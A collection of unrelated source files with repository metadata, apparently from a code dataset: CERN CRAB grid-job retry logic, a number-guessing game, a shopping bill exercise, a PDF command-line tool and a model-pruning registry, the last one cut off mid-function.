exitMsg = "Fatal Root Error maybe a corrupted input file. This error is being reported"
self.create_fake_fjr(exitMsg, 8022, 8022, fatalError=False) # retry the job
raise RecoverableError("Job failed to open local and fallback files.")
if exitCode == 1:
raise RecoverableError("Job failed to bootstrap CMSSW; likely a worker node issue.")
if exitCode == 50513 or exitCode == 81:
raise RecoverableError("Job did not find functioning CMSSW on worker node.")
# This is a difficult one -- right now CMSRunAnalysis.py will turn things like
# segfaults into an invalid FJR. Will revisit this decision later.
if exitCode == 50115 or exitCode == 195:
raise RecoverableError("Job did not produce a FJR; will retry.")
if exitCode == 134:
recoverable_signal = False
try:
fname = os.path.realpath("WEB_DIR/job_out.%s.%d.txt" % (self.job_id, self.crab_retry))
with open(fname, encoding='utf-8') as fd:
for line in fd:
if line.startswith("== CMSSW: A fatal system signal has occurred: illegal instruction"):
recoverable_signal = True
break
except Exception: # pylint: disable=broad-except
msg = "Error analyzing abort signal."
msg += "\nDetails follow:"
self.logger.exception(msg)
if recoverable_signal:
raise RecoverableError("SIGILL; may indicate a worker node issue.")
if exitCode == 8001 or exitCode == 65:
cvmfs_issue = False
try:
fname = os.path.relpath("WEB_DIR/job_out.%s.%d.txt" % (self.job_id, self.crab_retry))
cvmfs_issue_re = re.compile("== CMSSW: unable to load /cvmfs/.*file too short")
with open(fname, encoding='utf-8') as fd:
for line in fd:
if cvmfs_issue_re.match(line):
cvmfs_issue = True
break
except Exception: # pylint: disable=broad-except
msg = "Error analyzing output for CVMFS issues."
msg += "\nDetails follow:"
self.logger.exception(msg)
if cvmfs_issue:
raise RecoverableError("CVMFS issue detected.")
# Another difficult case -- so far, SIGKILL has mostly been observed at T2_CH_CERN, and it has nothing to do
# with an issue of the job itself. Typically, this isn't the user code's fault
# it was often a site or pilot misconfiguration that led to the pilot exhausting its allocated runtime.
# We should revisit this issue if we see SIGKILL happening for other cases that are the users' fault.
if exitCode == 137:
raise RecoverableError("SIGKILL; likely an unrelated batch system kill.")
if exitCode == 10034 or exitCode == 50:
raise RecoverableError("Required application version not found at the site.")
if exitCode == 60403 or exitCode == 243:
raise RecoverableError("Timeout during attempted file stageout.")
if exitCode == 60307 or exitCode == 147:
raise RecoverableError("Error during attempted file stageout.")
if exitCode == 60311 or exitCode == 151:
raise RecoverableError("Error during attempted file stageout.")
if exitCode:
raise FatalError("Job wrapper finished with exit code %d.\nExit message:\n %s" % (exitCode, exitMsg.replace('\n', '\n ')))
return 0
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def check_corrupted_file(self, exitCode):
"""
check if job stdout contains a message indicating a corrupted file and reports this
via a json file taskname.corrupted.job.<crabid>.<retry>.json
returns True/Falso accordingly to corrupted yes/no
"""
if not os.path.exists('/etc/use_corruption_check'):
return False
corruptedFile = False
suspiciousFile = False
inputFileName = 'NotAvailable'
RSE = self.site
RSE = RSE if not RSE.startswith('T1') else f"{RSE}_Disk"
fname = os.path.realpath("WEB_DIR/job_out.%s.%d.txt" % (self.job_id, self.crab_retry))
self.logger.debug(f'exit code {exitCode}, look for corrupted file in {fname}')
with open(fname, encoding='utf-8') as fd:
for line in fd:
line = line.rstrip() # remove trailing new-line
# remember last opened file, in case of 8021 that's the one that matters
if line.startswith("== CMSSW:") and ' Successfully opened file' in line:
inputFileName = f"/store/{line.split('/store/')[1]}" # strip protocol part
if line.startswith("== CMSSW:") and "Fatal Root Error:" in line:
corruptedFile = True
self.logger.info("Corrupted input file found")
self.logger.debug(line)
errorLines = [line]
# file name is in next line
continue
if corruptedFile:
errorLines.append(line)
if '/store/' in line and '.root' in line:
# this may be better done in the script which processes the BadInputFiles reports
# if '/store/user' in line or '/store/group' in line and not 'rucio' in line:
# # no point in reporting files unknown to Rucio
# corruptedFile = False
# break
# extract the '/store/...root' part of this line
fragment1 = line.split('/store/')[1]
fragment2 = fragment1.split('.root')[0]
inputFileName = f"/store/{fragment2}.root"
self.logger.info(f"RSE: {RSE} - ec: {exitCode} - file: {inputFileName}")
else:
corruptedFile = False
suspiciousFile = True
errorLines.append('NOT CLEARLY CORRUPTED, OTHER ROOT ERROR ?')
errorLines.append('DID Identification may not be corrrect')
self.logger.info("RootFatalError does not contain file info")
break
if corruptedFile or suspiciousFile:
# add pointers to logs
schedHostname = socket.gethostname().split('.')[0]
schedId = schedHostname.split('0')[1] # vomcs059 --> 59, vocms0144 --> 144 etc,
username = self.reqname.split(':')[1].split('_')[0]
webDirUrl = f"https://cmsweb.cern.ch:8443/scheddmon/0{schedId}/{username}/{self.reqname}"
stdoutUrl = f"{webDirUrl}/job_out.{self.job_id}.{self.crab_retry}.txt"
postJobUrl = f"{webDirUrl}/postjob.{self.job_id}.{self.crab_retry}.txt"
errorLines.append(f"stdout: {stdoutUrl}")
errorLines.append(f"postjob: {postJobUrl}")
# note things down
reportFileName = f'{self.reqname}.job.{self.job_id}.{self.crab_retry}.json'
corruptionMessage = {'DID': f'cms:{inputFileName}', 'RSE': RSE,
'exitCode': exitCode, 'message': errorLines}
with open(reportFileName, 'w', encoding='utf-8') as fp:
json.dump(corruptionMessage, fp)
self.logger.info('corruption message prepared, gfal-copy to EOS')
proxy = os.getenv('X509_USER_PROXY')
self.logger.info(f"X509_USER_PROXY = {proxy}")
if corruptedFile:
reportLocation = 'gsiftp://eoscmsftp.cern.ch/eos/cms/store/temp/user/BadInputFiles/corrupted/new/'
if suspiciousFile:
reportLocation = 'gsiftp://eoscmsftp.cern.ch/eos/cms/store/temp/user/BadInputFiles/suspicious/new/'
destination = reportLocation + reportFileName
cmd = f'gfal-copy -v -t 60 {reportFileName} {destination}'
out, err, ec = executeCommand(cmd)
if ec:
self.logger.error(f'gfal-copy failed with out: {out} err: {err}')
return corruptedFile
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def check_empty_report(self):
"""
Need a doc string here.
"""
if not self.report or not self.validreport:
raise RecoverableError("Job did not produce a usable framework job report.")
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def execute_internal(self, logger, reqname, username, job_return_code, dag_retry, crab_retry, job_id, dag_jobid, job_ad, used_job_ad):
"""
Need a doc string here.
"""
self.logger = logger
self.reqname = reqname
self.username = username
self.job_return_code = job_return_code
self.dag_retry = dag_retry
self.crab_retry = crab_retry
self.job_id = job_id
self.dag_jobid = dag_jobid
try:
self.dag_clusterid = int(self.dag_jobid.split(".")[0])
except ValueError:
pass
if used_job_ad:
# We can determine walltime and max memory from job ad.
self.ad = job_ad
if 'MaxWallTimeMinsRun' in self.ad:
self.MAX_WALLTIME = int(self.ad['MaxWallTimeMinsRun']) * 60
else:
msg = "Unable to get MaxWallTimeMinsRun from job classads. Using the default MAX_WALLTIME."
self.logger.debug(msg)
if 'RequestMemory' in self.ad:
self.MAX_MEMORY = int(self.ad['RequestMemory'])
else:
msg = "Unable to get RequestMemory from job classads. Using the default MAX_MEMORY."
self.logger.debug(msg)
msg = "Job ads already present. Will not use condor_q, but will load previous jobs ads."
self.logger.debug(msg)
self.get_job_ad_from_file()
else:
msg = "Will use condor_q command to get finished job ads from job_log."
self.logger.debug(msg)
self.get_job_ad_from_condor_q()
# Do we still need identification of site in self.get_report()?
# We can always get it from job ad.
if 'JOBGLIDEIN_CMSSite' in self.ad:
self.site = self.ad['JOBGLIDEIN_CMSSite']
self.get_report()
if self.ad.get("RemoveReason", "").startswith("Removed due to job being held"):
hold_reason = self.ad.get("HoldReason", self.ad.get("LastHoldReason", "Unknown"))
raise RecoverableError("Will retry held job; last hold reason: %s" % (hold_reason))
try:
self.check_empty_report()
# Raises a RecoverableError or FatalError exception depending on the exitCode
# saved in the job report.
check_exit_code_retval = self.check_exit_code()
except RecoverableError as e:
orig_msg = str(e)
try:
self.check_memory_report()
self.check_cpu_report()
self.check_disk_report()
self.check_expired_report()
except Exception: # pylint: disable=broad-except
msg = "Original error: %s" % (orig_msg)
self.logger.error(msg)
raise
raise
# The fact that check_exit_code() has not raised RecoverableError or FatalError
# doesn't necessarily mean that the job was successful; check_exit_code() reads
# the job exit code from the job report and it might be that the exit code is
# not there, in which case check_exit_code() returns silently. So as a safety
# measure we check here the job return code passed to the post-job via the
# DAGMan $RETURN argument macro. This is equal to the return code of the job
# when the job was executed, and is equal to -100[1,2,3,4] when ["job failed to
# be submitted to the batch system", "job externally removed from the batch
# system queue", "error in the job log monitor", "job not executed because PRE
# script returned non-zero"] respectively. In the particular case of job return
# code = -1004 and job exit code from (previous job retry) job report = 0, we
# should continue and not do the check. The reason is: the pre-job is not
# expected to fail; if the pre-job returned non-zero we assume it was done so
# in order to intentionally skip the job execution.
if not (self.job_return_code == -1004 and check_exit_code_retval == 0):
if self.job_return_code != JOB_RETURN_CODES.OK: # Probably means stageout failed!
msg = "Payload job was successful, but wrapper exited with non-zero status %d" % (self.job_return_code)
if self.job_return_code > 0:
msg += " (stageout failure)?"
raise RecoverableError(msg)
return JOB_RETURN_CODES.OK
# = = = = = RetryJob = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
def execute(self, *args, **kw):
"""
Need a doc string here.
"""
try:
job_status = self.execute_internal(*args, **kw)
self.record_site(job_status)
return job_status
except RecoverableError as e:
self.logger.error(str(e))
self.record_site(JOB_RETURN_CODES.RECOVERABLE_ERROR)
return JOB_RETURN_CODES.RECOVERABLE_ERROR
except FatalError as e:
self.logger.error(str(e))
self.record_site(JOB_RETURN_CODES.FATAL_ERROR)
return JOB_RETURN_CODES.FATAL_ERROR
except Exception as e: # pylint: disable=broad-except
self.logger.exception(str(e))
return 0 # Why do we return 0 here ?
| dmwm/CRABServer | src/python/TaskWorker/Actions/RetryJob.py | RetryJob.py | py | 27,933 | python | en | code | 15 | github-code | 13 |
33014996909 | import random
def run():
num_aleatorio = random.randint(1, 100)
num_elegido = int(input('Elige un número al azar: '))
while num_elegido != num_aleatorio:
if num_elegido < num_aleatorio:
print('Busca un número más grande')
else:
print('Busca un número más pequeño')
num_elegido = int(input('Elige otro número: '))
print('¡Ganaste!')
if __name__ == '__main__':
run()
| devpcastello/P-DS-Coins_Converter | adivina_el_numero.py | adivina_el_numero.py | py | 446 | python | es | code | 0 | github-code | 13 |
30241116 | from entities.key_data_processing.search_response import SearchResponse
from extractors.value_finding_status import ValueFindingStatus
from entities.key_data_processing.key_data import KeyData
class KeyDataParser:
def __init__(self, search_responses: list[SearchResponse]):
self.__search_responses = search_responses
def parse_key_data(self) -> KeyData:
key_data = dict()
for key_response in self.__search_responses:
if key_response.status == ValueFindingStatus.FOUND:
key_data[key_response.key_word] = key_response.value
else:
key_data[key_response.key_word] = None
return KeyData(key_data)
| AdrianC2000/InvoiceScannerApp | parsers/key_data_parser.py | key_data_parser.py | py | 692 | python | en | code | 0 | github-code | 13 |
11619097367 | #Nykaa
#User will provide you list of items they want to buy : "Lipstick", "Lip Balm", "Eyeliner", "Deo"
#Build a logic:
## If a item is in male list : assume price as 60, give 10% off
## If a item is in female list : assume price 100 give 20% off
## If a item is in unisex list : assume price as 120 give 5% off
## Calculate the total bill, ask for coupon, otherwise assume default coupon NYKAAIPO22, and give 10% off if bill > 500 otherwise don't
male = ["Beard Oil", "Trimmer", "Men Facewash", "Men Soap"]
female = ["Eyeliner", "Lipstick", "Lipbalm", "ColdCream"]
unisex = ["Deo", "Soap", "Perfume", "Sanitizer", "Shampoo"]
def bill_to_pay(bill,coupon = "NYKAAIPO22"):
if bill >= 65 and coupon == "NYKAAIPO22":
bill = bill - bill*0.1
else:
pass
return bill
def bill_calculator(items):
total_bill = 0
print(items)
for item in items:
print(item)
if item in male:
price = 60
discount = 0.1 * price
bill = price - discount
elif item in female:
price = 100
discount= 0.2 * price
bill = price - discount
elif item in unisex:
price = 120
discount = 0.05 * price
bill = price - discount
total_bill +=bill
total_bill = bill_to_pay(total_bill)
print(f"your total bill is: {total_bill}")
bill_calculator(["Deo","Soap"])
| myselfparag/python-programming | functions/option_argument_hm.py | option_argument_hm.py | py | 1,473 | python | en | code | 0 | github-code | 13 |
1589545432 | import re
input_content = str(input("请输入姓名和手机号,并以空格间隔:"))
# 判断中文正则模板
chinese_pat = re.compile(r"[\u4e00-\u9fa5]+")
# 判断手机号是否合法正则模板
mobile_pat = re.compile("^(13\d|14[5|7]|15\d|166|17\d|18\d)\d{8}$")
phone_name = "".join(re.findall(chinese_pat, input_content))
phone_num = "".join(re.findall(r"\d+", input_content))
if re.search(mobile_pat, phone_num):
print(phone_num)
else:
print("手机号码不合法")
print(phone_name, end="\n")
| Abeautifulsnow/python_learning | scripts/python/re_mobile.py | re_mobile.py | py | 521 | python | zh | code | 0 | github-code | 13 |
70956260178 | from PyQt5.QtWidgets import QWidget, QHBoxLayout
from widgets.Map.Toolbox.Button import Button
from widgets.Map.MapMode import MapMode
class ToolboxWidget(QWidget):
def __init__(self, parent):
super(ToolboxWidget, self).__init__(parent)
self.__parent = parent
self.setGeometry(40, 0, 150, 50)
self.setLayout(QHBoxLayout())
self.layout().setContentsMargins(0, 0, 0, 0)
self.layout().setSpacing(0)
moveBtn = Button("arrows-alt.svg",
MapMode.MOVE_ITEMS,
parent.modeObserver())
rotateBtn = Button("sync-alt.svg",
MapMode.ROTATE_ITEMS,
parent.modeObserver())
createBtn = Button("table.svg",
MapMode.CREATE_ITEMS,
parent.modeObserver())
moveBtn.clicked.connect(self.moveButtonCallback)
rotateBtn.clicked.connect(self.rotateButtonCallback)
createBtn.clicked.connect(self.createButtonCallback)
self.layout().addWidget(moveBtn)
self.layout().addWidget(rotateBtn)
self.layout().addWidget(createBtn)
def moveButtonCallback(self, event):
self.__parent.modeObserver().on_next(MapMode.MOVE_ITEMS)
def rotateButtonCallback(self, event):
self.__parent.modeObserver().on_next(MapMode.ROTATE_ITEMS)
def createButtonCallback(self, event):
self.__parent.modeObserver().on_next(MapMode.CREATE_ITEMS)
| GeorgeHulpoi/piu-restaurant-management | widgets/Map/Toolbox/ToolboxWidget.py | ToolboxWidget.py | py | 1,559 | python | en | code | 0 | github-code | 13 |
46804889164 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from os import system
from optparse import OptionParser
queries_liste = {}
quiet = False
databaseConn = None
databaseCursor = None
def process(pkt):
global quiet
global databaseConn
ip46 = IPv6 if IPv6 in pkt else IP
if pkt.haslayer(DNSQR) and UDP in pkt and pkt[UDP].sport == 53 and ip46 in pkt:
# pkt[IP].dst == IP source of the DNS request
# pkt[IP].src == IP of the DNS server
# pkt[DNS].qd.qname == DNS name
query = pkt[DNS].qd.qname.decode("utf-8") if pkt[DNS].qd != None else "?"
if not pkt[ip46].dst in queries_liste:
queries_liste[pkt[ip46].dst] = {}
if not pkt[ip46].src in queries_liste[pkt[ip46].dst]:
queries_liste[pkt[ip46].dst][pkt[ip46].src] = {}
if not query in queries_liste[pkt[ip46].dst][pkt[ip46].src]:
queries_liste[pkt[ip46].dst][pkt[ip46].src][query] = 1
else:
queries_liste[pkt[ip46].dst][pkt[ip46].src][query] += 1
if databaseConn and query != None and query != "?":
databaseCursor.execute("INSERT OR IGNORE INTO domains (domain) VALUES (?);", (query,))
databaseConn.commit()
databaseCursor.execute("SELECT idDomain FROM domains WHERE domain=?;", (query,))
domainId = databaseCursor.fetchone()[0]
databaseCursor.execute("SELECT count, idWhoAsk FROM whoAsk WHERE ipFrom=? AND ipTo=? AND domainId=?;", (pkt[ip46].src, pkt[ip46].dst, domainId))
whoAsk = databaseCursor.fetchone()
if whoAsk:
databaseCursor.execute("UPDATE whoAsk SET count=? WHERE idWhoAsk=?",(whoAsk[0]+1 if whoAsk[0] else 2, whoAsk[1]))
else:
databaseCursor.execute("INSERT INTO whoAsk (ipFrom, ipTo, domainId, count) VALUES (?,?,?,1);", (pkt[ip46].src, pkt[ip46].dst, domainId))
databaseConn.commit()
if not quiet:
system('clear')
print("{:15s} | {:15s} | {:15s} | {}".format("IP source", "DNS server", "Count DNS request", "Query"))
for ip in queries_liste:
print("{:15s}".format(ip)) # IP source
for query_server in queries_liste[ip]:
print(" "*18+"{:15s}".format(query_server)) # IP of DNS server
for query in queries_liste[ip][query_server]:
print(" "*36+"{:19s} {}".format(str(queries_liste[ip][query_server][query]),query)) # Count DNS request | DNS
| solka-git/git-sample | dns_sniffer.py | dns_sniffer.py | py | 2,217 | python | en | code | 0 | github-code | 13 |
26944164640 | #!/bin/python3
from flask import Flask, request, Response
import requests, urllib.parse
from bs4 import BeautifulSoup
from markupsafe import escape
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
from PIL import Image
import io
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'Hello, CDK classroom!'
@app.route('/saludo/<persona>')
def saludoDinamico(persona):
return 'Hola %s, bienvenido!!' % persona
@app.route('/cuadrado/<float:num>')
def calculaCuadrado(num):
resp = num * num
return 'Respuesta: %f' % resp
@app.route('/curso', methods=['POST', 'GET'])
def webScrap():
textReturn = "Método no aceptado"
if request.method == 'POST':
data = request.get_json()
try:
busqueda = data['busqueda']
textReturn = "<p>Tu termino de busqueda es: <em>" + busqueda +"</em></p><ul>"
busquedaText = busqueda.lower()
busqueda = urllib.parse.quote(busqueda)
page = requests.get('https://www.tecgurus.net/cursos?busqueda=' + busqueda)
# Create a BeautifulSoup object
soup = BeautifulSoup(page.text, 'html.parser')
cursos_list = soup.find(class_='right-service-box')
# Pull text from all instances of <a> tag within BodyText div
cursos_items = cursos_list.find_all('img')
for curso in cursos_items:
tituloCurso = curso.get('alt');
if tituloCurso.lower().find(busquedaText) != -1:
textReturn += "<li>" + curso.get('alt') + "</li>"
textReturn +='</ul>'
except:
textReturn = "Ocurrio un error al procesar"
return textReturn
@app.route('/audiosaludo/<msgText>')
def audiotext(msgText):
saludohtml = "<audio controls autoplay> <source src='https://code.responsivevoice.org/getvoice.php?text=%s&lang=es-MX&engine=g1&name=&pitch=0.5&rate=0.5&volume=1&key=uu8DEkxz&gender=female' type='audio/mpeg'> </audio>" % msgText
return saludohtml
@app.route('/convertir', methods=['POST', 'GET'])
def cambio_base():
data = request.get_json()
decimal = int(data['decimal'])
base = int(data['base'])
conversion = ''
while decimal // base != 0:
conversion = str(decimal % base) + conversion
decimal = decimal // base
return str(decimal) + conversion
#### Procedimiento para graficar ####
@app.route('/grafica.png', methods=['POST', 'GET'])
def plot_png():
if request.method == 'POST':
data = request.get_json()
print(data)
if data['tipo'] == 'pie':
fig = pie(data)
elif data['tipo'] == 'bar':
fig = bar(data)
else:
fig = line(data)
output = io.BytesIO()
FigureCanvas(fig).print_png(output)
return Response(output.getvalue(), mimetype='image/png')
else:
return "Petición GET no es válida"
def bar(datos):
fig = Figure()
axis = fig.add_subplot(1, 1, 1)
#data = {'apples': 10, 'oranges': 15, 'lemons': 5, 'limes': 20}
#names = list(data.keys())
#values = list(data.values())
axis.bar(datos['nombres'], datos['valores'])
return fig
def pie(datos):
fig = Figure()
axis = fig.add_subplot(1, 1, 1)
axis.pie(datos['valores'], labels=datos['nombres'], autopct='%1.1f%%',
shadow=True, startangle=90)
axis.axis('equal')
return fig
def line(datos):
fig = Figure()
axis = fig.add_subplot(1, 1, 1)
axis.plot(datos['nombres'], datos['valores'])
return fig
###########
@app.route('/evidencia', methods=['POST', 'GET'])
def consumo():
if request.method == 'POST':
data = request.get_json()
print(data)
imagen = Image.open('./comida.jpg')
imagen.show()
return "<b>Se mando: título </b> %s" %data['titulo'] + ", <b> descripción: </b> %s " %data['descripcion'] + " <b> calorías: </b> %i" %data['caloria'] + " <b> fecha: </b> %s" %data['fecha']
else:
return "Not found method"
if __name__ == "__main__":
app.run(host="0.0.0.0", port=5000, debug=True)
| SusanaCoronaC/CDK | src/webService.py | webService.py | py | 4,270 | python | en | code | 0 | github-code | 13 |
21996192094 | import pandas as pd
import dash
from dash import html, dcc, Input, Output
import plotly.express as px
# Read the data
spacex_df = pd.read_csv("spacex_launch_dash.csv")
max_payload = spacex_df['Payload Mass (kg)'].max()
min_payload = spacex_df['Payload Mass (kg)'].min()
# Create a dash application
app = dash.Dash(__name__)
# Dropdown options for the Launch Site
launch_sites = spacex_df['Launch Site'].unique().tolist()
dropdown_options = [{'label': 'All Sites', 'value': 'ALL'}] + \
[{'label': site, 'value': site} for site in launch_sites]
app.layout = html.Div([
html.H1('SpaceX Launch Records Dashboard', style={'textAlign': 'center', 'color': '#503D36', 'font-size': 40}),
# Task 1: Add a Dropdown List for Launch Site Selection
dcc.Dropdown(id='site-dropdown', options=dropdown_options, value='ALL', placeholder="Select a Launch Site"),
html.Br(),
# Task 2: Pie Chart Display (Callback defined below)
dcc.Graph(id='success-pie-chart'),
html.Br(),
html.P("Payload range (Kg):"),
# Task 3: Add a Payload Range Slider
dcc.RangeSlider(id='payload-slider', min=min_payload, max=max_payload,
value=[min_payload, max_payload],
marks={0: '0', 1000: '1000', 2000: '2000', 3000: '3000', 4000: '4000', 5000: '5000', 6000: '6000', 7000: '7000', 8000: '8000'},
step=1000),
html.Div(dcc.Graph(id='success-payload-scatter-chart')),
])
# Task 2: Pie Chart Callback
@app.callback(
Output('success-pie-chart', 'figure'),
[Input('site-dropdown', 'value')]
)
def update_pie_chart(selected_site):
if selected_site == 'ALL':
filtered_df = spacex_df
fig = px.pie(filtered_df, names='Launch Site', title='Total Success Launches by Site')
else:
filtered_df = spacex_df[spacex_df['Launch Site'] == selected_site]
fig = px.pie(filtered_df, names='class', title=f'Total Success Launches for site {selected_site}')
return fig
# Task 4: Scatter Chart Callback
@app.callback(
Output('success-payload-scatter-chart', 'figure'),
[Input('site-dropdown', 'value'), Input('payload-slider', 'value')]
)
def update_scatter_chart(selected_site, payload_range):
low, high = payload_range
filtered_df = spacex_df[(spacex_df['Payload Mass (kg)'] >= low) & (spacex_df['Payload Mass (kg)'] <= high)]
if selected_site != 'ALL':
filtered_df = filtered_df[filtered_df['Launch Site'] == selected_site]
fig = px.scatter(filtered_df, x='Payload Mass (kg)', y='class', color='Booster Version Category',
title='Correlation between Payload and Success for all Sites' if selected_site == 'ALL' else f'Correlation between Payload and Success for {selected_site}')
return fig
# Run the app
if __name__ == '__main__':
app.run_server()
| AbdullaOmarA/IBM-Data-Science-Professional | Applied Data Science Capstone/7.SpaceX Interactive Dashboard with Ploty Dash.py | 7.SpaceX Interactive Dashboard with Ploty Dash.py | py | 2,841 | python | en | code | 0 | github-code | 13 |
27659365618 | import sys
from pypdf import PdfReader, PdfWriter
from argparse import ArgumentParser
from pdftool.compress import compress_page
from pdftool.remove_images import remove_images
from pdftool.encryption import encrypt, decrypt
from pdftool.merge import merge
from pdftool.split import range_to_page_indices
from pdftool.search import search
from pdftool.rotate import rotate
import os
parser = ArgumentParser(description=__doc__)
def main(args=sys.argv[1:]) -> int:
parser.add_argument("input_pdf_name", help="The name of the input PDF file")
parser.add_argument(
"-o", "--output",
dest="output_pdf_name",
help="The name for the PDF output file",
required=False,
)
parser.add_argument(
"-c", "--compress",
dest="should_compress",
action="store_true"
)
parser.add_argument(
"-ri", "--remove_images",
dest="should_remove_images",
action="store_true"
)
parser.add_argument(
"-e", "--encrypt",
dest="encrypt_key",
help="The key to be used to encrypt the PDF file",
required=False,
)
parser.add_argument(
"-d", "--decrypt",
dest="decrypt_key",
help="The key to be used to decrypt the PDF file",
required=False,
)
parser.add_argument(
"-m", "--merge",
dest="merge_file",
help='''The name of a file to be merged into the input file in the format FILE_NAME:POSITION:PAGES, POSITION can be excluded or set to -1 to append to the end, specific PAGES can be specified (e.g. 1,2,6-10)''',
nargs="+",
action="append",
required=False,
)
parser.add_argument(
"-rot", "--rotate",
dest="rotate_pages",
help="Rotates the given range of pages by the angle in the formate RANGE:ANGLE (e.g. 1,2,4-5:90), positive for clockwise negative for counter-clockwise",
nargs="+",
action="append",
required=False,
)
parser.add_argument(
"-s", "--search",
dest="search_term",
help="should search the given text and return the sentences",
required=False,
)
parser.add_argument(
"-p", "--pages",
dest="pages",
help="Extract pages (e.g. '2,3-6')",
required=False,
)
parser.add_argument(
"-r", "--remove",
dest="remove_pages",
help="Remove pages (e.g. '2,3-6')",
required=False,
)
input_parameters, _unknown_input_parameters = parser.parse_known_args(args)
name = input_parameters.input_pdf_name
output_name = output_name = name + "-output"
if input_parameters.output_pdf_name:
output_name = input_parameters.output_pdf_name
should_compress = False
if input_parameters.should_compress:
should_compress = input_parameters.should_compress
if should_compress is True:
print("- Compression Enabled")
should_remove_images = False
if input_parameters.should_remove_images:
should_remove_images = input_parameters.should_remove_images
if should_remove_images is True:
print("- Remove Images Enabled")
encryption_key = ""
should_encrypt = False
if input_parameters.encrypt_key:
encryption_key = input_parameters.encrypt_key
should_encrypt = True
print("- Encrypting with key: {}".format(encryption_key))
decryption_key = ""
should_decrypt = False
if input_parameters.decrypt_key:
decryption_key = input_parameters.decrypt_key
should_decrypt = True
print("- Decryptying with key: {}".format(decryption_key))
merge_files = []
if input_parameters.merge_file:
for file in input_parameters.merge_file:
x = file[0].split(':')
file_name = x[0]
if not file_name.endswith(".pdf"):
print("{} must end with '.pdf' extension".format(file_name))
return 1
pos = -1
if len(x) > 1:
pos = int(x[1])
pages = []
if len(x) > 2:
pages = list(range_to_page_indices(x[2]))
print("- Merging file: {} {}".format(file_name, "at position {}".format(pos) if pos > -1 else ""))
merge_files.append((file_name, pos, pages))
rotate_pages = {}
if input_parameters.rotate_pages:
for rot in input_parameters.rotate_pages:
x = rot[0].split(':')
if len(x) < 2:
print("{} must be in the format RANGE:ANGLE".format(x))
return 1
pages = list(range_to_page_indices(x[0]))
angle = int(x[1])
if abs(angle) % 90 != 0:
print("Angle must be a multiple of 90")
return 1
print("- Rotating page/s {} by {}".format(pages, "{} degrees clockwise".format(angle) if angle > 0 else "{} degrees counter-clockwise".format(abs(angle))))
for page in pages:
rotate_pages[page] = angle
remove_range = None
if input_parameters.remove_pages:
if merge_files:
print("Removing pages is incompatible with merging pages")
return 1
remove_range = list(range_to_page_indices(input_parameters.remove_pages))
page_range = None
if input_parameters.pages:
if merge_files:
print("Selecting pages is incompatible with merging pages")
return 1
if remove_range:
print("Selecting pages is incompatible with removing pages")
return 1
page_range = list(range_to_page_indices(input_parameters.pages))
if not name.endswith(".pdf"):
print("File must end with '.pdf' extension")
return 1
if not output_name.endswith(".pdf"):
output_name += ".pdf"
reader = PdfReader(name)
if should_decrypt:
if reader.is_encrypted:
reader = decrypt(reader, decryption_key)
input_file_stats = os.stat(name)
print('''Input file stats:
Size in bytes: {}
Pages: {}
'''.format(input_file_stats.st_size, len(reader.pages)))
writer = PdfWriter()
for index, page in enumerate(reader.pages):
if page_range and index not in page_range:
continue
if remove_range and index in remove_range:
continue
if should_compress:
page = compress_page(page)
if rotate_pages and index in rotate_pages.keys():
page = rotate(page, rotate_pages[index])
writer.add_page(page)
for file, pos, pages in merge_files:
writer = merge(writer, file, pos, pages)
if should_remove_images:
writer = remove_images(writer)
if should_encrypt:
writer = encrypt(writer, encryption_key)
with open("{}".format(output_name), "wb") as f:
writer.write(f)
output_file_stats = os.stat(output_name)
print('''Input file stats:
Size in bytes: {}
Pages: {}
'''.format(output_file_stats.st_size, len(writer.pages)))
if input_parameters.search_term:
content = " ".join(page.extract_text().strip() for page in reader.pages)
content = ' '.join(content.split())
print('\n'.join(search(input_parameters.search_term,content)))
if __name__ == "__main__":
sys.exit(main()) | dwelman-xebia/innoday-python-pdf-tool | pdftool/main.py | main.py | py | 7,387 | python | en | code | 0 | github-code | 13 |
28080517480 | import pruning
import torch
import os
from foundations import paths
from foundations.hparams import ModelHparams
from foundations.step import Step
from models import cifar_vgg, mnist_mlp, imagenet_resnet, cifar_pytorch_resnet, tinyimagenet_resnet
from models import bn_initializers, initializers
registered_models = [mnist_mlp.Model, cifar_vgg.Model, imagenet_resnet.Model,
cifar_pytorch_resnet.Model, tinyimagenet_resnet.Model]
def get(model_hparams: ModelHparams, outputs=None, pruning_strategy = None):
"""Get the model for the corresponding hyperparameters."""
# Select the initializer.
if hasattr(initializers, model_hparams.model_init):
initializer = getattr(initializers, model_hparams.model_init)
else:
raise ValueError('No initializer: {}'.format(model_hparams.model_init))
# Select the BatchNorm initializer.
if hasattr(bn_initializers, model_hparams.batchnorm_init):
bn_initializer = getattr(bn_initializers, model_hparams.batchnorm_init)
else:
raise ValueError('No batchnorm initializer: {}'.format(model_hparams.batchnorm_init))
# Create the overall initializer function.
def init_fn(w):
initializer(w)
bn_initializer(w)
# Select the model.
model = None
for registered_model in registered_models:
if registered_model.is_valid_model_name(model_hparams.model_name):
model = registered_model.get_model_from_name(model_hparams.model_name, init_fn, outputs)
break
if model is None:
raise ValueError('No such model: {}'.format(model_hparams.model_name))
# Set prunable layers type
model.prunable_layer_type = 'BN' if pruning_strategy == 'network_slimming' else 'default'
# Freeze various subsets of the network.
bn_names = []
for k, v in model.named_modules():
if isinstance(v, torch.nn.BatchNorm2d):
bn_names += [k + '.weight', k + '.bias']
if model_hparams.others_frozen_exceptions:
others_exception_names = model_hparams.others_frozen_exceptions.split(',')
for name in others_exception_names:
if name not in model.state_dict():
raise ValueError(f'Invalid name to except: {name}')
else:
others_exception_names = []
for k, v in model.named_parameters():
if k in bn_names and model_hparams.batchnorm_frozen:
v.requires_grad = False
elif k in model.output_layer_names and model_hparams.output_frozen:
v.requires_grad = False
elif k not in bn_names and k not in model.output_layer_names and model_hparams.others_frozen:
if k in others_exception_names: continue
v.requires_grad = False
return model
def load(save_location: str, save_step: Step, model_hparams, outputs=None, pruning_strategy = None):
state_dict = torch.load(paths.model(save_location, save_step))
model = get(model_hparams, outputs, pruning_strategy)
model.load_state_dict(state_dict)
return model
def exists(save_location, save_step):
return os.path.exists(paths.model(save_location, save_step))
def get_default_hparams(model_name):
"""Get the default hyperparameters for a particular model."""
for registered_model in registered_models:
